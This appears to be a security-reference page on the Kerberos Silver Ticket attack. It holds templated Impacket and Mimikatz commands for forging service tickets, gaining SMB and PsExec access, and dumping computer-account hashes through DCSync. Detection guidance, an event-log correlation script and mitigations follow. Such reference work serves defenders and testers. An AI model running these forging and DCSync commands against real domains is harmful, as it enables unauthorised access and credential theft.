Silver Ticket
Overview
A Silver Ticket is a forged Kerberos service ticket (the ticket normally issued by the TGS, the Ticket Granting Service) for a specific service, created using the service account's NTLM hash or AES key. Unlike Golden Tickets, which forge TGTs and require the krbtgt hash, Silver Tickets target individual services and require only that service's password hash. Silver Tickets never touch the KDC: the forged ticket is presented directly to the target service, which makes them harder to detect.
ATT&CK Mapping
- Tactic: TA0006 - Credential Access
- Technique: T1558.002 - Steal or Forge Kerberos Tickets: Silver Ticket
Prerequisites
- NTLM hash or AES key of the target service account (often the computer account)
- Domain SID
- SPN of the target service
Techniques
Common Silver Ticket Targets
| Service | SPN Format | Use Case |
|---|---|---|
| CIFS (SMB) | cifs/dc.domain.local | File share access, PsExec |
| HTTP | http/web.domain.local | Web application access |
| LDAP | ldap/dc.domain.local | DCSync |
| HOST | host/dc.domain.local | Scheduled tasks, WMI |
| MSSQL | MSSQLSvc/db.domain.local:1433 | Database access |
For services running as the computer account, the computer account's hash is used. The computer account name ends with $ (e.g., DC01$).
Forge Silver Ticket (Impacket)
```bash
# Impacket — forge silver ticket for CIFS (SMB access)
# https://github.com/fortra/impacket
impacket-ticketer -nthash <service_ntlm_hash> -domain-sid <domain_sid> -domain <domain> -spn cifs/<target_hostname> Administrator
# Forge for LDAP (can be used for DCSync)
impacket-ticketer -nthash <dc_machine_hash> -domain-sid <domain_sid> -domain <domain> -spn ldap/<dc_hostname> Administrator
# With AES key (stealthier)
impacket-ticketer -aesKey <service_aes256_key> -domain-sid <domain_sid> -domain <domain> -spn cifs/<target_hostname> Administrator
```
Use the forged ticket:
```bash
export KRB5CCNAME=Administrator.ccache
# Impacket
# https://github.com/fortra/impacket
impacket-psexec '<domain>/Administrator@<target_hostname>' -k -no-pass
impacket-smbclient '<domain>/Administrator@<target_hostname>' -k -no-pass
```
Forge Silver Ticket (Mimikatz)
```
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# Silver ticket for CIFS service (inject into memory)
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /target:<target_hostname> /service:cifs /rc4:<service_ntlm_hash> /ptt
# Silver ticket for HTTP service
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /target:<web_hostname> /service:http /rc4:<service_ntlm_hash> /ptt
# Silver ticket for LDAP (for DCSync)
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /target:<dc_hostname> /service:ldap /rc4:<dc_machine_hash> /ptt
```
Get Service Account Hash
Computer account hashes can be extracted via:
```bash
# Impacket — DCSync for computer account
# https://github.com/fortra/impacket
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc-user '<computer>$'
```
```
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
mimikatz# lsadump::dcsync /domain:<domain> /user:<computer>$
```
Detection Methods
Network-Based Detection
- TGS presented to a service without a corresponding TGT request to the KDC
- This is the key detection vector — Silver Tickets bypass the KDC entirely
Host-Based Detection
- Windows Security Event 4624 with Kerberos authentication but no corresponding 4768 (TGT request) on the DC
- Service tickets with unusual lifetimes or encryption types
- PAC validation failures (if the service validates the PAC with the KDC)
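The 4624-without-4768 correlation listed above can be run over centrally collected logs. The following is an added example, not part of the original page: the function name, the dict layout and the sample events are constructed for illustration, and it assumes the AD default 10-hour TGT lifetime and 5-minute clock-skew tolerance.

```python
from datetime import datetime, timedelta

TGT_LIFETIME = timedelta(hours=10)  # assumption: AD default maximum TGT lifetime
CLOCK_SKEW = timedelta(minutes=5)   # assumption: Kerberos default clock-skew tolerance

# Constructed sample: Security events from DC01 and file server FS01, already merged.
EVENTS = [
    {"EventID": 4768, "Computer": "DC01", "TimeCreated": "2024-05-06T08:00:00",
     "TargetUserName": "alice"},
    {"EventID": 4624, "Computer": "FS01", "TimeCreated": "2024-05-06T09:30:00",
     "TargetUserName": "ALICE", "AuthenticationPackageName": "Kerberos"},
    {"EventID": 4624, "Computer": "FS01", "TimeCreated": "2024-05-06T11:00:00",
     "TargetUserName": "Administrator", "AuthenticationPackageName": "Kerberos"},
    {"EventID": 4624, "Computer": "FS01", "TimeCreated": "2024-05-06T11:05:00",
     "TargetUserName": "bob", "AuthenticationPackageName": "NTLM"},
]

def _ts(event):
    """Parse the event timestamp (ISO format without timezone, as in the sample)."""
    return datetime.strptime(event["TimeCreated"], "%Y-%m-%dT%H:%M:%S")

def orphan_kerberos_logons(events, window=TGT_LIFETIME, skew=CLOCK_SKEW):
    """Return 4624 Kerberos logons with no 4768 for that user in the window before them."""
    # Index TGT request times per account (case-insensitive account name).
    tgt_times = {}
    for e in events:
        if e["EventID"] == 4768:
            tgt_times.setdefault(e["TargetUserName"].lower(), []).append(_ts(e))
    orphans = []
    for e in events:
        if e["EventID"] != 4624 or e.get("AuthenticationPackageName") != "Kerberos":
            continue  # NTLM and other logons are out of scope for this check
        t = _ts(e)
        issued = tgt_times.get(e["TargetUserName"].lower(), [])
        # A legitimate logon should follow a TGT request made while that TGT was valid.
        if not any(t - window <= g <= t + skew for g in issued):
            orphans.append(e)
    return orphans

if __name__ == "__main__":
    for hit in orphan_kerberos_logons(EVENTS):
        print(f'{hit["TimeCreated"]} {hit["Computer"]} {hit["TargetUserName"]}: '
              "Kerberos logon with no TGT request on the DC")
```

Treat hits as triage leads: a gap in DC log collection produces the same pattern as a forged ticket.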
Mitigation Strategies
- PAC validation — configure services to validate the PAC with the KDC (increases KDC load but detects Silver Tickets)
- Rotate computer account passwords — default rotation is every 30 days; ensure this is not disabled
- Managed Service Accounts — automatic password rotation for service accounts
- AES-only Kerberos — with RC4 disabled, RC4-based Silver Tickets stand out and can be detected